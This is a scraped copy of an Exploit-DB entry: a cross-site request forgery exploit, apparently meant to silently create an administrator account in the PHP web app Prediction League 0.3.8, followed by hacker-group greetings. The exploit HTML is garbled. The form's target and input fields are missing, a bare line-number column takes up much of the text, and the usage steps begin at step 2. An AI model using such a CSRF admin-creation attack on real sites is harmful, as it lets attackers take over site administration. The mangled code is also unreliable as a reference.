Prediction League 0.3.8 – Cross-Site Request Forgery (Add Admin) - 体验盒子

作者： indoushka

日期： 2010-04-04

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12043/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

========================================================================================

| # Title: Prediction League 0.3.8 CSRF Create Admin User Exploit

| # Author : indoushka

| # Home : www.iqs3cur1ty.com/vb

| # Tested on: Lunix Français v.(9.4 Ubuntu)

| # Bug: CSRF Create Admin User Exploit

======================Exploit By indoushka =================================

# Exploit:

<table>

<tr>

Admin User Administration

</font>

</td>

</tr>

<tr>

Admin User Name

</font>

</td>

</font>

</td>

The name for the admin user.

</font>

</td>

</tr>

<tr>

Password

</font>

</td>

</font>

</td>

The password for the admin user.

</font>

</td>

</tr>

<tr>

</td>

</tr>

</table>

</form>

<?php

}

?>

</body>

</html>

2 - Save As .html

3 - Login

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================

Greetz :

Exploit-db Team :

(loneferret+Exploits+dookie2000ca)

all my friend :

His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)

www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/

www.securityreason.com * www.m-y.cc * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net

--------------------------------------------------------------------------------------------------------------